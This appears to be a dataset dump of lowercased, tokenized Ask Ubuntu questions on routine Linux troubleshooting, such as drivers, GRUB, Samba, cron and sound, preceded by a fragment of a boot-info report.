) ' search -- no-floppy -- fs-uuid -- set 626bd315-3ecc-4724-96a4-39f00b5f6331 set locale_dir= ( $ root ) /boot/grub/locale set lang=en insmod gettext if [ $ { recordfail } = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # menuentry 'ubuntu , with linux 2.6.32-38-generic-pae ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod ext2 set root= ' ( hd0,2 ) ' search -- no-floppy -- fs-uuid -- set 626bd315-3ecc-4724-96a4-39f00b5f6331 linux /boot/vmlinuz-2.6.32-38-generic-pae root=uuid=626bd315-3ecc-4724-96a4-39f00b5f6331 ro quiet splash initrd /boot/initrd.img-2.6.32-38-generic-pae } menuentry 'ubuntu , with linux 2.6.32-38-generic-pae ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod ext2 set root= ' ( hd0,2 ) ' search -- no-floppy -- fs-uuid -- set 626bd315-3ecc-4724-96a4-39f00b5f6331 echo 'loading linux 2.6.32-38-generic-pae ... ' linux /boot/vmlinuz-2.6.32-38-generic-pae root=uuid=626bd315-3ecc-4724-96a4-39f00b5f6331 ro single echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-2.6.32-38-generic-pae } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod ext2 set root= ' ( hd0,2 ) ' search -- no-floppy -- fs-uuid -- set 626bd315-3ecc-4724-96a4-39f00b5f6331 linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod ext2 set root= ' ( hd0,2 ) ' search -- no-floppy -- fs-uuid -- set 626bd315-3ecc-4724-96a4-39f00b5f6331 linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry `` windows 7 ( loader ) ( on /dev/sda3 ) '' { insmod ntfs set root= ' ( hd0,3 ) ' search -- no-floppy -- fs-uuid -- set 457351f40cffde49 chainloader +1 } # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =============================== sda2/etc/fstab : ================================ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda2 during installation uuid=626bd315-3ecc-4724-96a4-39f00b5f6331 / ext2 errors=remount-ro 0 1 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =================== sda2 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) 125.679679394 = 134.947528192 boot/grub/core.img 2 125.573421001 = 134.833434112 boot/grub/grub.cfg 1 125.532954693 = 134.789983744 boot/initrd.img-2.6.32-38-generic-pae 3 125.523200512 = 134.779510272 boot/vmlinuz-2.6.32-38-generic-pae 2 125.532954693 = 134.789983744 initrd.img 3 125.523200512 = 134.779510272 vmlinuz 2
112159	deleted libssl-1.0.0 files by mistake	i have foolishly deleted the libssl-1.0.0 , i have completely deleted the src , lib and all the files that look like ( *lib*ssl1* ) or something like that ! i tried to use the synaptic package manager to update , or re-install the missing library , no luck , the returned error `` e : internal error , no file name for libssl1.0.0 '' appears . i tired to use apt-get -- reinstall , download-only ... same error i included also all packages that have libssl* in their name , no good too . today the system has been running silly , firefox and flash at chromium are n't working ... anyway i can recover without having to use live cd ? thanks in advance !
112164	how can i `` diff '' two files with nautilus ?	i have installed meld and found out it 's a great comparing tool . unfortunately there is no integration with nautilus 3.2 . this means , i ca n't right click on files and select an option to open them in meld for comparison . i have seen in the tools comment that the tool need the diff-ext package to be installed . this package has been removed from ubuntu universe , i am guessing because gtk 3.0 . even if i manually downloaded from source forge the diff-ext package , when i try to configure it the check fails with the message : checking for diff_ext ... configure : error : package requirements ( libnautilus-extension > = 2.14.0 gconf-2.0 > = 2.14.0 gnome-vfs-module-2.0 > = 2.14 ) were not met : no package 'libnautilus-extension ' found no package 'gconf-2.0 ' found no package 'gnome-vfs-module-2.0 ' found ok , so from this output i gather that indeed gtk 2 is being required to install the diff extension to nautilus . now , my question is : is there a possibility to integrate meld into nautilus ? or , are there any other diff based tool which integrate with current nautilus ? so gtk3 based . i am using ubuntu 11.10 if there was any doubt so far .
112168	how can i fix the sticky cursor grabbed by unity on dual monitor setup ?	i was able to get a dual monitor setup working in 12.04 beta release recently , using the nvidia proprietary drivers . so far it has been working well with only minor `` out of the box '' issues to workaround . the only issue/annoyance that i am experiencing is the multiple unity panels ( one on each screen ) . i 'm pretty sure there is n't a way to change that right now , but what is happening is if the cursor is moving slowly enough near the panel in the center of the desktop ( just at transition to the two monitors ) , the panel grabs the cursor and makes it `` sticky '' . if i am moving the cursor quickly enough , it does not do this , and simply continues on to the next screen . is anyone aware of any options that may change the `` stickiness '' of the cursor around the unity panel ? it makes for a rather annoying experience to have to jiggle the mouse to release the cursor from the panel whenever i simply need something on the other screen .
112177	how do i tunnel and browse the server webpage on my laptop ?	i run a web app in one of my lab servers , and i have already setup x11 forwarding on those machines . other lab members can tunnel through ssh , and browse that web app on their local browser at home . i ca n't . last time i checked with them , there is almost nothing i need to do . when i type 192.168.1.113/webapp i get nothing . any tips ? thanks . i ended up using the second method : ) ssh -l 8080 : < server-ip-address > :80 < username > @ < remote-addr > -n
112181	need advice on samba shares and permissions	i 'm trying to achieve the following , in order to access samba shares from a windows xp box : live users get a home directory which can be accessed with full permissions through samba if they are authenticated as the owner . i have this working with the following samba config settings : # # # # # # # authentication # # # # # # # security = user encrypt passwords = yes passdb backend = tdbsam obey pam restrictions = yes unix password sync = yes passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdate $ pam password change = yes map to guest = bad user # # # # # # # shares # # # # # # # [ homes ] comment = % s path = /home/ % s allow hosts = 127 . 192.168.1. valid users = % s browseable = yes writable = yes create mask = 0700 directory mask = 0700 this is pretty much working a expected , apart from the right permissions being set when i create files and directories . but i read some other answers that talk about tinkering with different mask variants . so i 'll probably get that fixed , so : so far so good . what i 'd like to have additionally , is another folder ( music ) that can be accessed with full permissions by me ( let 's say myusername ) , and only read permissions by guests ( that do n't need to authenticate to access these folders ) . i created a group called music and a user called music with a home directory /home/music , and also added myusername to the group music . then i tried the following samba config : [ music ] comment = % s path = /home/music allow hosts = 127 . 192.168.1. browsable = yes writable = yes read list = @ music write list = myusername create mask = 0700 directory mask = 0700 however , logging in on this samba directory as myusername from windows xp did n't let me create files and/or directories . could this be because of conflicts with the [ homes ] setting ( since it is already referring to directories in /home as well ) ? or am i misunderstanding the principles of user/group permissions ? apart from that , i also started thinking : do i even need to create the group and user music to begin with ? it appears to be a bit redundant when they would n't have write access to begin with anyway . could n't i simply create the directory /home/music with sudo ( or another suggestion perhaps ? ) , and use the above samba settings . whichever way , i do like to have this folder on the /home partition ( it 's on a separate hdd being the only partition on that hdd ) . i consider this kind of as my 'data ' partition , not merely 'user data ' . or is that frowned upon , in general ? as you can see , i 'm having a bit of difficulty with thinking of a good permissions strategy and coming up with the right samba config setting . could you shed some light on how i could best achieve what i am trying to accomplish ?
112186	how do you create a custom application launcher in gnome shell ?	how do you create a custom application launcher in gnome shell ? i have a local eclipse installation that i 'd like to be to quickly launch . so i created a symlink to the eclipse binary and placed it on my desktop . if i open a terminal , cd to ~/desktop and run ./eclipse it starts eclipse perfectly . however , if i click the eclipse icon on my desktop , and choose run , nothing happens . alternatively , i would n't mind being able to search for eclipse on the `` activities '' screen , but i ca n't find any documentation on adding or registering custom applications .
112187	why does my pc restart when trying to use a live cd and flash drive ?	recently i was recommended ubuntu 11.10 64-bit . i burned the .iso to a disc and verified it and went to boot it on my pc . when i selected it to boot on the disc , it would get to the menu . as i wanted to try it first , i selected that . my pc then got to the purple screen , went black , and then my pc will restart . so i have burned another cd to the same problem . i decided to try with a usb and i get the very same problem . my pc specs are : windows 7 64-bit , 16 gb ddr3 ram , sapphire radeon hd 7970 ( 21197-00-40g ) 3072mb pcie x16 gen 3.0 eyefinity 6 edition.is something wrong with compatibility ?
112192	getting the `` created '' timestamp of a pdf file in the cli	i 'd like to know if there 's a cli command to get the `` created '' timestamp from the `` document '' tab ( from file properties of a pdf ) in the cli ? i know that i can use stat to get access/modified/changed info from the filesystem , but with the meta-data in the `` document '' tab being embedded in the file itself , i 'm not sure how to go about extracting it via the cli . the reason i need to do this is to create a list of filenames along with `` created '' timestamps for about 22,000 pdf files . obviously , this is something far better suited to the cli than the gui .
112194	kubuntu 12.04 firefox and rekong do n't know how to open downloaded files	i just installed kubuntu 12.04 beta 1 . both rekong and firefox do n't know how to `` open containing folder '' for downloaded items . they also do n't know how open the item itself . ( i 'll give the specific error below . ) furthermore , if i manually tell firefox ( in the dialog ) to remember the file associations , that creates a new problem . every file opens in dolphin first , then dolphin opens the correct application . ( it could almost be a feature instead of a bug , but it gets annoying at times . ) my installation is missing the file /usr/share/applications/mimeinfo.cache . i 'm also missing /usr/share/applications/defaults.list and ~/.local/share/applications/mimeapps.list . if anyone has default copies of those files for this build , i would appreciate copies . i think they may help me resolve this . ( anyone else see those files missing ? ) details : rekong is installed by default and the problem is present in a standard configuration . to reproduce , download a file with rekong . then go to downloads > open directory ( of the downloaded file ) . the result is : error : rekonq does not know how to handle this protocol : the same situation exists in firefox . i used the included kubuntu menu item to install firefox . no problems with the installation , everything standard . but when i download an item ( e.g. , a jpg image ) with firefox and then choose to either open it or open the containing folder , i get a dialog titled `` launch application '' and i have to `` choose an application '' . once i choose an application , telling firefox to remember it leads to the problem above : every file opens in dolphin . it seems that firefox does n't know the mime types . however , dolphin does know the mime types . more info : in firefox preferences > applications , the only content types shown are irc , ircs , mailto , podcast , tar file , webca and webfeed . normally , there would be many more . i tried deleting mimetypes.rdf ( as mentioned in a mozilla knowledge base article ) in my firefox profile and it did not resolve the issue . i also tried copying a known good complete firefox profile from my other computer ( linux mint 12 ) . once i began using that profile , it also had the problem under kubuntu 12.04 . here 's some more info : $ cat ~/.local/share/applications/mimeapps.list cat : /home/user/.local/share/applications/mimeapps.list : no such file or directory $ cat /usr/share/applications/defaults.list cat : /usr/share/applications/defaults.list : no such file or directory unfortunately , copying those files from a working ubuntu installation did not resolve the issue . it had seemingly no impact . the default applications for handling files in dolphin works correctly . i have been continuing to research this . i was reading this knowledge base article : http : //kb.mozillazine.org/file_types_and_download_actions # resetting_download_actions it says , `` all versions of firefox and seamonkey will use an installed and enabled plugin to open a downloaded file by default , based on its mime type . '' i checked and the only plugin installed in firefox is skype buttons for kopete . nothing else . on my linux mint install , there are a number of plugins , including gnome shell integration . could missing plugins be the issue ? there 's a similar question here with no solution . here 's a question where the problem sounds almost identical , but the solution is unrelated . i 'm working with a new , fresh installation of kubuntu and i do n't have any other de installed .
112195	unable to connect to regular sites using ie7 in wine	i have the latest version of ubuntu installed one week back . i installed wine and used playonlinux to install ie7 . it is successfully installed . it connects to bing , google and does the searches , but when i directly enter urls like mail.yahoo.com and so on it gives message `` internet explorer can not display the webpage '' has any one seen this error and resolved this ?
112197	changing read-write permissions on my external seagate hard drive	i have an external hard drive ( seagate free agent ) that i normally download files to . i have a dual boot ubuntu 11.10 along with windows 7-64 bit . i can read all of my files in my external hd perfectly , but when i attempt to do a download of a file to this drive , i get an `` unable to write because of read only '' disk error . when i attempt to change the permissions of the disk through the `` properties '' bar , i still get an error that i do n't have the proper permissions to change permissions . i have heard of `` mounting '' the disk , but i am afraid of mistakenly reformatting and destroying all the data that i have currently on that drive . how best should i safely change the permissions on that drive so that i can write and download files to the drive ? ? the drive is listed under /dev/sdc1 .
112200	how can i set up active directory user authentication ?	i am an active directory engineer , so not really a linux savvy person . i basically know enough to break a linux workstation or server . we have a team that needs to use ubuntu workstations with their ad accounts . i have been able to join an ubuntu vm ( the system i am writing this on ) to my dev forest using this article : https : //help.ubuntu.com/community/activedirectorywinbindhowto i have not been able to figure out how to get ad users to log on to the workstation . any help would be great .
112201	msi radeon hd6450 showing only 256megs of memory ?	i got my graphics card installed , msi radeon hd6450.my question is this card is supposed to have 2 gigs of ddr5 memory on it but after running a couple commands its only showing 256megs ? is there something i can do to fix this or is this just a normal thing and the 256megs is a generic reading for all cards ?
112202	how to disable automatic download of new podcast episodes in rhythmbox ?	after adding a new podcast to rhythmbox it starts downloading the newest episode automatically without asking the user for permission . i do find this behaviour pretty annoying especially when you have a lot of podcasts and are using 3g broadband to access the internet . can you update the podcast feed and then choose manually which episode you want to download ? did not find this in the settings/preferences ...
112205	how do i cancel ubuntu one music streaming ?	i need to cancel my ubuntu one music streaming . i do not know what web site address to use . my cell phone will not download this .
112206	how can i get nvidia-96 installed ?	i 'm at my wits end here . this is my last effort before i go back to windows . i need to get nvidia-96 proprietary driver installed . synaptic wo n't install it because it says it has dependencies . i installed every single dependency it listed except for `` xorg-video-abi-10 '' which does not show up as an item that can be installed . i have no idea what to do . using 11.10 with a nvidia geforce 3 gpu . anyone know how to get this dang driver installed ? @ fossfreedom : the opensource driver is extremely slow . so slow that the os is unusableâwords appear seconds after i type themâprograms take forever to perform actions . also it is causing my monitor to turn on and off for no reason . @ yossile : synaptic shows that i have xserver-xorg-core installed . and xserver-xorg-core-udeb does not show up as something that can be installed . @ papseddy : when i try to install the downloaded nvidia driver it says it wo n't work until i disable nouveau kernel driver . i have tried everything to get this dang nouveau kernel driver disabled . nothing has been successful .
112210	looking for direction for easy , affordable movie editing software with a filter to make movie look old ( 8 mm )	i need some direction . i 've had some experience with ms movie maker . i 'm looking for stepping it up with some real software , especially something that has a filter that will take my iphone videos look old-ish , like an 8 mm aged home movie . any thoughts ?
112211	creating debian package for qt app	i 'm writing an ide in c++ using qt for the gui and qt creator as an ide . i have seen many tutorials about the debian packaging system but i am still not sure i get it . my program is not ready yet so i do n't want to submit it to developer.ubuntu.com for someone to package it , but i want to do it to easily distribute a few copies . i use git for vcs and my code is hosted at github . i want to know if i should be keeping my code directory in a / related structure . like : /usr/bin for the binaries and so on . this is for making the packaging process as easy as it can be . do i need to modify the makefile to put the binaries in /usr/bin or something like that ? i do not have much experience with gnu make . is it a problem to host my code at github ? because i prefer it to launchpad and algo prefer git to bazaar . also , can someone explain how to do the packaging process ?
112212	failed virtualbox install prevents my system from starting up properly	i 'm running ubuntu 11.10 with kernel 3.3rc6 . i tried to install virtualbox 4.1.8 with the amd64 .deb package off the virtualbox site . on install i got a kernel panic saying `` unable to handle kernel paging request at ffff ... '' . when i reboot into ubuntu now , just after it boots up , it starts to run unattended upgrades and i again get : * starting virtualbox kernel modules unable to handle kernel paging request at ffff ... ... etc i booted up okay on recovery mode , but when i shut down the system it gets stuck on : * stopping virtualbox kernel modules and i have to manually power down . if i try sudo apt-get remove virtualbox-4.1 , it similarly gets stuck while stopping the virtualbox kernel modules . at the moment i 'd be happy just removing the problematic install so my system boots up okay . i do n't really need virtualbox right now , but i do need a working system . thanks for the help !
112214	switching to a new user after session is locked	i am running 12.04 with two users and am hoping i am just over looking something . when one user account idles and locks i am unable switch users . is there a way for another user to log in once the system locks , or must the first user unlock the computer ? i believe in at least some other distros i get an option on the lock screen to log in as a different user - but that option is missing . any suggestions about anything i 'm overlooking here ?
112217	prolog files not recognized	prolog .pl files are shown as perl files , both in files browser and in geany/gedit syntax-highlighting . is there a way to let it recognized prolog files as non perl files ?
112221	grub not being displayed so unable to select os - dualboot always loading ubuntu	i have just completed installing ubuntu 11.10 onto an old laptop ( ibm t40 ) which had windows xp already installed on it . ubuntu seemed to install correctly and there were no errors displayed and i got the install complete - reboot message . when i did the reboot the laptop shutdown ok and restarted but instead of displaying the grub menu it seemed to go directly into ubuntu . i have tried reinstalling the grub and a few other things like setting windows as the default os . nothing has changed . i can see and mount the windows partition and it all look ok - i have a feeling it would work if i was able to get the grub menu on the screen . any ideas ?
112228	crappy theme ... again	i know , this topic was here before ... . but none of the suggestions helped and i 'm confused , i do n't know what i am missing . but lets begin . i have a ubuntu 11.10 which was upgraded by all those years from 8.04 so it 's kind of old , but all works fine except theme . right after install all looked great but after one of updates ( do n't know which ) theme got crappy . let 's start with lightdm . it looks fine , but settings button is not transparent ( it has common gt border ) and password entry box is not rounded . instead of dots to mask password i see '* ' . well i think this is a small problem , the bigger one are the menus . also context menus are the same , other menus looks ok. after i login unity starts and looks ... . well as it should look . but expanding any menu from notification area ( including user switch and system menu ) spoils that effect . i have a strange theme on those menus . light gray background , darker gray text ( almost unreadable ) and black separators/inactive items . selection looks normal ( orange bg/white text ) there is also one more strange thing . menus from nautilus are under title bar instead on unity panel ( i have reinstalled appmenu-gtk3 appmenu-gtk appmenu-qt ) any suggestions ? i can post screens , but i think i covered all in text . i 've tried reinstalling theme packages , after that changing theme with advanced configuration util . this did n't help so i 've reinstalled unity and still nothing . reinstaling unity menus also did not help . editing some flags in gconf editor provided some results , but ... . rather for worse . my theme looks like on screens below ( done with my phone ... . login screen does n't have prtscr handling , and when menu is open for some reason ptrscr also does n't work ) http : //imageshack.us/photo/my-images/33/imag0082a.jpg/ http : //imageshack.us/photo/my-images/811/imag0081nm.jpg/
112229	instance resets to default after stop/start	i installed nova + glance on my laptop . i ran an instance type m1.tiny with ubuntu 10.04 image . then i installed apache2 and run a wordpress site on this instance . everything fine ! but when i reset my laptop ( host machine ) or stop the instance , then when i start it again , every package i installed is gone . the instance is `` blank '' like the brand new after i created by `` euca-run-instance '' . is it the default config of openstack or and error on my laptop ? what should i do if i want to reuse the instance ? thank you !
112235	how can i find files quicker than find or locate ?	i have been using find command to find files on my 1 tb hard disk . it takes very long . then i used locate which proved to be faster with regular update using updatedb . but the limitation of locate is that i can not find files with certain size or modified/created time . can you suggest me any ideas on how to find files at more speed or in that case how to pipe output of locate command in a way that all other information like size , time , etc . can be displayed or redirected to a file .
112238	why is rosetta stone the wikipedia page on ubuntu install ?	i 've just done a clean install of ubuntu 11.04 . during the installation slide-show , i noticed that on the browser slide it displayed a segment of the wikipedia page for rosetta stone . any idea what the relevance is to ubuntu ?
112242	daily cron job not running	a quick overview : i have a script that will daily backup my source code repository from svn into a tarball for that day . i have tested the script and it works very well as long as i run it as sudo , because of ownership of the output directory . so the issue is that i want to run this daily , so i put a link to it in the /etc/cron.daily directory . here are the contents of the directory . thom @ spenser : /etc/cron.daily $ ls -l total 60 -rwxr-xr-x 1 root root 189 2011-09-14 02:21 apport -rwxr-xr-x 1 root root 15535 2011-10-06 11:30 apt -rwxr-xr-x 1 root root 314 2011-08-08 16:57 aptitude lrwxrwxrwx 1 root root 24 2012-02-28 11:05 backup - > /usr/local/bin/backup.sh -rwxr-xr-x 1 root root 502 2011-06-08 11:48 bsdmainutils -rwxr-xr-x 1 root root 256 2011-10-06 04:04 dpkg -rwxr-xr-x 1 root root 372 2011-10-04 16:50 logrotate -rwxr-xr-x 1 root root 1353 2011-07-27 07:17 man-db -rwxr-xr-x 1 root root 606 2011-08-17 09:16 mlocate -rwxr-xr-x 1 root root 249 2011-06-24 05:36 passwd -rwxr-xr-x 1 root root 2417 2011-07-01 17:25 popularity-contest -rwxr-xr-x 1 root root 383 2011-09-30 15:09 samba -rwxr-xr-x 1 root root 3594 2011-09-19 20:07 standard thom @ spenser : /etc/cron.daily $ the problem is that it simply never runs . here is the permissions for that script : thom @ spenser : /etc/cron.daily $ ls -l /usr/local/bin/backup.sh -rwxr-xr-x 1 root root 260 2012-02-28 11:03 /usr/local/bin/backup.sh ideas ?
112243	are there any open source alternative to landscape ?	better yet , are there any spacewalk-like software that works for both redhat-based and debian-based systems ?
112246	how to install libvirt-php ?	i am trying to install libvirt-php on my ubuntu server 11.10 . could any one tell me what are the simplest steps to install libvirt-php ? ?
112249	what is the easiest way to set up a cron job ?	every time i set up a cron job there is something wrong with it and i spend a lot of time trouble shooting it . i use ubuntu and i would like to know what tools exist to make my life easier when setting up cron .
112251	grub rescue : hd0 out of disk	my harddisk went to readonly mode while the system was running . after a restart , i started getting `` hd0 out of disk '' and got thrown into grub-rescue . from there , i was able to access my grub folder ( via ls ( hd0 , msdos5 ) /boot/grub ) . right now i 'm on an livecd on that machine . it manages to mount and read/write to the partition with ubuntu , /boot/grub/grub.cfg is there and i have around 9gb of free space . any ideas what could have caused it , and what should i do ?
112253	when i plug in an headphone to computer , my speakers still working	when i plug in my headphone to the computer , speakers 're still working although headphone is working too . do you know how can i solve this problem in ubuntu 11.04 i have asus g50v and when i type cat /proc/asound/cards it gives the list : 0 [ intel ] : hda-intel - hda intel hda intel at 0xf9ff8000 irq 49 i set my /etc/modprobe.d/alsa-base to below option as suggested in that post options snd-hda-intel model=g50v however with all these settings problem still occurs thanks in advance : ) i solve my problem : i solved my problem : first : sudo gedit /etc/modprobe.d/alsa-base.conf and open the config file than add following 5 lines to the end options snd-pcsp index=-2 alias snd-card-0 snd-hda-intel alias sound-slot-0 snd-hda-intel options snd-hda-intel model=m51va options snd-hda-intel enable_msi=1 then sudo gedit /etc/modprobe.d/options and add followings to this file then reboot options snd-pcsp index=-2 alias snd-card-0 snd-hda-intel alias sound-slot-0 snd-hda-intel options snd-hda-intel model=m51va options snd-hda-intel enable_msi=1
112254	switch between different version of kernel without a reboot	i want to switch between different version of kernel installed on my system without reboot . that is to say if i have '3.0.0-16-generic kernel currently running and i have older kernel 3.0.0-14-generic also there , then i maybe be able to switch to 3.0.0-14-generic ( the other kernel ) without rebooting . ( i need to do live kernel debugging and making changes so in order to do so i ca n't reboot )
112255	making ubuntu try-able by other systems on the network using network boot ?	i 'm wondering if a ubuntu pc can act as a server to provide the ability to network boot ubuntu 's live cd to other system ( s ) in the network . to make my question more clear : from wikipedia 's article on network booting : the initial software to be loaded is loaded from a server on the network ; for tcp/ip networks this is usually done using the trivial file transfer protocol . the server from which to load the initial software is usually found by broadcasting or multicasting a bootstrap protocol or dynamic host configuration protocol request . typically , this initial software is not a full image of the operating system to be loaded , but just part of it - enough for the operating system to start and then take control of the booting process , and continue booting over the network . i want to make one ubuntu pc as the `` server '' and enable the other pc 's to be able to boot from a ubuntu image i host on the server
112260	dualscreen not working when using a dell xps 15 via an hdmi cable to a tv	i have a dell xps 15 and when i connect the hdmi cable to the tv absolutely nothing happens . im running ubuntu 11.10 edit : i have n't installed any drivers and there are no ones in the `` additional drivers '' and under graphics in system info : driver : unknown experience : standard
112265	how to install qt creator ide version 2.4.1 with repository ?	i 'm trying to install qt creator ide version 2.4.1 with repository but there is qt creator ide version 2.2.1 , i searched but did n't find repository to download qt . just found the offline qt creator installer from site of nokia . should i download the offline installer ?
112269	can not save music files on iphone ios5	i had installed and updated the libimobiledevice , and now , ubuntu can see my iphone after connected . great to have this libimobile device tool . from banshee or rhythmbox , can see music in my iphone . but , the music files only can move one way . i can not save the music files into the iphone . only the music files can be copied out from iphone into the harddrive of ubuntu . what 's wrong with my setup ? or this is the bottleneck of current libimobiledevice ? thanks for your advice .
112276	why does `` indicator-datetime '' have broken dependencies , and how can i fix it ?	i just upgraded to ubuntu 11.10 from 11.04 and clock/calendar does n't appear on the bar . so i figured out that indicator-datetime was n't installed . when i tried to install it the following error appears : xxx @ yyy : / $ sudo apt-get install indicator-datetime reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : indicator-datetime : depends : libecal1.2-10 ( > = 3.2.1 ) but 3.2.0-0ubuntu1 is to be installed depends : libedataserver1.2-15 ( > = 3.2.1 ) but 3.2.0-0ubuntu1 is to be installed depends : libedataserverui-3.0-1 ( > = 3.2.1 ) but 3.2.0-0ubuntu1 is to be installed e : unable to correct problems , you have held broken packages . i do n't know how to solve it .
112279	low volume sound even with the volume up to max ?	this was n't the case before , but recently i get relatively low volume sound in my laptop , both the integrated speakers and the headphones , even with the volume up to max . i checked alsamixer and everything is up to max . any ideas ?
112282	arbitrary ext4-fs remounts scattered throughout dmesg output	i 've been trying to diagnose a message i see in my dmesg output . last night i was watching a video which really taxed my notebook and i noticed that the computer was super hot and the fan would n't stop blasting away at full speed , even after i rebooted . at anyrate , last night and again this morning i am seeing messages withing my dmesg output to the effect of : ext4-fs ( sda1 ) : re-mounted . opts : errors=remount-ro , commit=0 and occassionally it 'll do a doublt remount with the primary remount listed with commit=600 now this may be another issue but i thought i might mention it because they could be related , but i am also seeing this message frequently within my output : composite sync not supported i looked within syslog to see if i could see any indication of what might be causing this but i see nothing . this seem completely random . is there something i can do to determine what is causing this ?
112291	gui app for bandwidth shaping ( internet speed limiter )	this is a similar question as this one : limit internet bandwidth but in this case i am looking for a gui app . the other question was 2+ years ago so a gui might be available that i could use to not only monitor but also change the maximum speed at which clients can download . a webapp or a gui app will help . it needs to work on 12.04 or newer . just to give an idea , i am looking for something similar to netlimiter that gives me the control to know : how much download/upload speed an ip/mac has ( assuming this is a lan ) limit the download/upload speed for an ip/mac . option to say at what time a speed can be limited or not . can cap when a certain amount has been downloaded/uploaded ( like 250mb per day )
112294	how can i see my files in 2nd partition of hdd ?	i 'm a new ubuntu user . i installed ubuntu on my computer yesterday . i choose my 2nd partition of hdd 's mount point as /home and format type ext4 . now , i ca n't see my 2nd partition or ca n't change format type the only thing i can do is choosing flag type from gparted . do you have any idea how can i use it ?
112297	disk check error at boot and then gnu grub . how do i fix it ?	when i have booted my machine and choose ubuntu . it did a hard drive check and got an error . then it opened a black screen like a terminal where i can enter commands . how to fix ?
112302	how do i disable the `` nouveau kernel driver '' ?	i 'm trying to install proprietary nvidia graphics driver i downloaded from nvidia website . it will not install because it says that the `` nouveau kernel driver '' needs to be disabled first . i opened synaptic and uninstalled everything that had nvidia , nouveau , or jockey in its name . it still wo n't work . what exactly do i need to do to disable the `` nouveau kernel driver '' ?
112303	new sound devices show up in hardware but not input or output	if i insert a new audio device it shows up under the hardware tab of sound settings : however , i do n't see it as an option in input or output tab :
112309	error splicing file : value too large for defined data type	i just bought a new external hard disk for backup . when copying some files i get this error : error splicing file : value too large for defined data type i have searched for this but ca n't find anything relevant . i am copying from a ntfs partition on my ubuntu to another ntfs partition on the external hdd . there error pops up only for some files no matter the size . are the files corrupted or encrypted or is it just bad ntfs ? also i am using ubuntu 10.4 . and the partitions are writable via ntfs config tool .
112310	64 bit nvidia driver on 32 bit machine	i am using ubuntu 10.04 x86 version.i have two video cards ( 1 integrated and 1 nvidia on inter core-i5 processor with 3gb ram ) .right now my display resolution is very poos as i cant use graphic card . i tried a lot of methods ( including sudo apt-get remove nvidia* ; sudo apt-get install nvidia-current ) to install driver for nvidia geforce but failed . here is output of lshw -c video *-display description : vga compatible controller product : nvidia corporation vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:16 memory : f0000000-f0ffffff memory : c0000000-cfffffff ( prefetchable ) memory : d0000000-d1ffffff ( prefetchable ) ioport:3000 ( size=128 ) memory : f1080000-f10fffff ( prefetchable ) *-display unclaimed description : vga compatible controller product : intel corporation vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : bus_master cap_list configuration : latency=0 resources : memory : f1400000-f17fffff memory : e0000000-efffffff ( prefetchable ) ioport:4000 ( size=64 ) as shown in the output ( width:64 bit ) , shall i install x64 version of ubuntu to make drivers work ? or what should i do to make them work ? update i am following this post for installation . whenever i execute sudo gdm-stop , i am not getting terminal or any screen . even on ctrl+alt+f2 i am not getting terminal screen ( just a blank screen with no promt ) . how to go ?
112317	ca n't access root file folder	i just installed ubuntu 11.0 and when i try to go into root folder to add new wirless drivers it says i do n't have permissions to access the root folder even though i am the only user on the computer and i am an administrator . how do i fix this ?
112318	strange connections by gvfsd-http -- spawner	for a little while now , a strange connection has been showing up on my netstat made by the command /usr/lib/gvfs/gvfsd-http -- spawner :1.1 /org/gtk/gvfs/exec_spaw/2 by the time i notice it , the connection is always at the closed state . every time i trace the ip address , it usually says that no website is registered . i am unsure what activated this . it could be one of my browsers ( chrome and firefox ) . i 'm getting a little worried about this . could someone clue me in to what this could possibly bee , and how to prevent the connection . ( for better finding this , could someone add the tags : spawner , gvfsd-http , netstat )
112323	how do i connect to my broadband automatically when i startup ?	can someone tell me how to set up ubuntu to connect to my broadband hub automatically when i start my computer , as it is i have to connect manually each time . thanks . i 'm using version 11.04
